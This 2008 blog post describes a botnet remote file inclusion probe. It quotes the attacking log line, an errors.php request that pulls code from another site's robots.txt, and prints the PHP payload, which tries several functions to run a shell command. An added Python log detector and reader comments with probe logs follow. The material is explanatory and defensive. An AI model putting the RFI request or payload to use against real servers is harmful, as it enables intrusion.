Friday, January 18, 2008

Botnet Whacks ROBOTS.TXT File

Just when you think having your server hacked is bad enough, these idiots start messing with your robots.txt file.

Here's an example:

83.133.96.246 "GET //errors.php?error=http://www.thefalife.com/robots.txt??? HTTP/1.0" "libwww-perl/5.48"

What did that robots.txt contain?

<?php
echo "549821347819481
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."
";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Looks like botnets are now OK with messing up your search engine positions as well as messing up your server.

Just imagine that all the pages or images you have blocked are suddenly crawled.

Then imagine that every junk crawler you've denied is suddenly crawling all over your site.

It could take months or years to clean up the damage, if ever.

Fun, huh?
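
An added example, not part of the original post: one way to spot requests like the one above in an access log, by flagging any query parameter whose value is a remote URL. The sample lines, the placeholder hosts and the function name find_rfi_probes are constructed for illustration and assume the three-field log shape shown in the post.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the same shape as the log excerpt in the post
# (client IP, quoted request line, quoted User-Agent). Hosts are placeholders.
SAMPLE_LOG = '''\
203.0.113.7 "GET //errors.php?error=http://payload.example/robots.txt??? HTTP/1.0" "libwww-perl/5.48"
198.51.100.9 "GET /index.php?page=about&lang=en HTTP/1.1" "Mozilla/5.0"
203.0.113.8 "GET /view.php?tpl=http%3A%2F%2Fpayload.example%2Fid.txt%3F HTTP/1.0" "libwww-perl/5.805"
198.51.100.4 "GET /login?next=/account HTTP/1.1" "Mozilla/5.0"
'''

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" "([^"]*)"$')
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)


def find_rfi_probes(log_text):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the assumed shape; skip rather than guess
        ip, _method, target, agent = m.groups()
        path, _, query = target.partition('?')
        for pair in query.split('&'):
            name, _, raw = pair.partition('=')
            value = unquote(raw)  # also catches http%3A%2F%2F... encodings
            if not REMOTE_URL_RE.match(value):
                continue
            findings.append({
                'ip': ip,
                'path': path,
                'param': name,
                'url': value.rstrip('?'),       # URL without the '?' padding
                'padded': value.endswith('?'),  # padding as in the post's log line
                'agent': agent,
            })
    return findings


if __name__ == '__main__':
    for finding in find_rfi_probes(SAMPLE_LOG):
        print(finding)
```

Parameters that legitimately carry URLs (redirect or feed targets, for instance) will also match, so treat a hit as a lead and weigh it together with the `padded` flag and the user agent.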

3 comments:

Anonymous said...

I must say, great blog; stumbled across it while googling "204.15.64.0/21"

I find your articles on the proxies a bit amusing. I guess everyone is entitled to their own opinion.
Though responsible proxy operators should learn to use robots.txt and block access to the cgiproxy directories from being crawled.

Anyways,

You have some other great content here, keep up the good blog, I enjoyed reading it.

IncrediBILL said...

Bob,

Glad you enjoyed the blog ;)

You wouldn't find proxies nor my opinions about them amusing if you were abused by them as much as I have been.

Got attacked by some idiot using a bunch of proxies this weekend so I'm building more walls around the proxies just to keep more out.

Anonymous said...

I see almost constant probes for remote file inclusion (RFI) and known exploitable files.

Today's log:
19:07:36 ... 38.101.72.8 GET //comments-display-tpl.php
19:11:05 ... 63.247.139.144 GET //comments-display-tpl.php
19:13:13 ... 206.221.184.180 GET //comments-display-tpl.php
19:22:08 ... 80.74.241.22 GET //comments-display-tpl.php